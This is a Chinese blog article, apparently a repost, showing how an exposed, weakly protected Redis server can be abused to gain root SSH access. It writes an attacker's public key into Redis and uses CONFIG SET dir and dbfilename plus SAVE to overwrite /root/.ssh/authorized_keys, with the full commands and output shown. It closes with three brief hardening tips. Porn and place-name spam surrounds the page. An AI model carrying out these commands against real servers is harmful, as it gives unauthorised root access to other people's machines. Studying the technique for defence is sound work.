久久精品人人爽,华人av在线,亚洲性视频网站,欧美专区一二三

Redis挖礦原理的示例分析

190次閱讀
沒有評論

共計 2581 個字符,預計需要花費 7 分鐘才能閱讀完成。

這篇文章主要介紹 Redis 挖礦原理的示例分析,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!

演示一下如果通過 Redis 進行提權獲取遠程服務器的 Root 用戶。

1、首先我們需要一些先決條件

條件一:你首先要有一個 Redis,并且我們要知道他的端口【默認 6379】;

條件二:Redis 的密碼不能過于復雜,或者沒有密碼;

條件三:啟動 Redis 的用戶最好是 Root 用戶,這樣破壞性更大;

2、開始搞事情

2.1 創(chuàng)建一對秘鑰

通過 ssh-keygen 生成一對,當然可以使用已經有的都沒有問題。

root@kali:/usr/local/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa

接下來通過公鑰生成攻擊鍵值

(echo -e  \n\n  cat id_rsa.pub; echo -e  \n\n)   foo.txt

內容如下

root@kali:/tmp/rediskey# cat foo.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali

這里前后增加兩個換行符是為了防止數據連接在一起造成失效問題。

2.2 配置 Key 到 Redis 中

操作如下:

root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK

登錄 Redis 進行檢查,是否已經寫入進 Redis 中。

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379  get bar
 \n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n

2.3 通過 Redis 保存機制替換系統(tǒng)文件

且看如下操作

192.168.243.129:6379  config set dir /root/.ssh
192.168.243.129:6379  config get dir
1)  dir 
2)  /root/.ssh 
192.168.243.129:6379  config set dbfilename  authorized_keys 
192.168.243.129:6379  save
192.168.243.129:6379  exit

這個時候,我們登錄遠程主機看下效果。

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host  192.168.243.129 (192.168.243.129)  can t be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added  192.168.243.129  (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64
Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~#

OK,到這里我們已經提權成功了,那我們看下導出文件到底是什么呢?其實就是 Redis 的保存文件形式罷了,有興趣可以自己打開看看,這里不再展示。

3、如何預防

這個漏洞威力還是挺大的,我們現(xiàn)在只是拿到主機權限一個而已,加入放到定時任務執(zhí)行一些腳本然后在批量感染呢?

防范的技巧如下:

Redis 不要監(jiān)聽在危險 IP 上,如果有請加防火墻控制

Redis 一定要增加密碼限制,且不能是弱口令;

Redis 盡量不要用 Root 用戶身份來啟動。

做到如上三點防范 Redis 挖礦,沒問題的

以上是“Redis 挖礦原理的示例分析”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注丸趣 TV 行業(yè)資訊頻道!

正文完
 
丸趣
版權聲明:本站原創(chuàng)文章,由 丸趣 2023-07-15發(fā)表,共計2581字。
轉載說明:除特殊說明外本站除技術相關以外文章皆由網絡搜集發(fā)布,轉載請注明出處。
評論(沒有評論)
主站蜘蛛池模板: 阳信县| 长顺县| 仲巴县| 克拉玛依市| 英德市| 林西县| 五原县| 新晃| 江永县| 荔浦县| 徐汇区| 焉耆| 逊克县| 金华市| 静宁县| 老河口市| 乌拉特中旗| 板桥市| 遂宁市| 晋江市| 谢通门县| 黄梅县| 玉龙| 桐柏县| 庄浪县| 融水| 舟曲县| 永定县| 湖北省| 丹寨县| 巴彦县| 三明市| 嘉荫县| 北宁市| 大连市| 永吉县| 大渡口区| 鄂州市| 汝阳县| 英山县| 额敏县|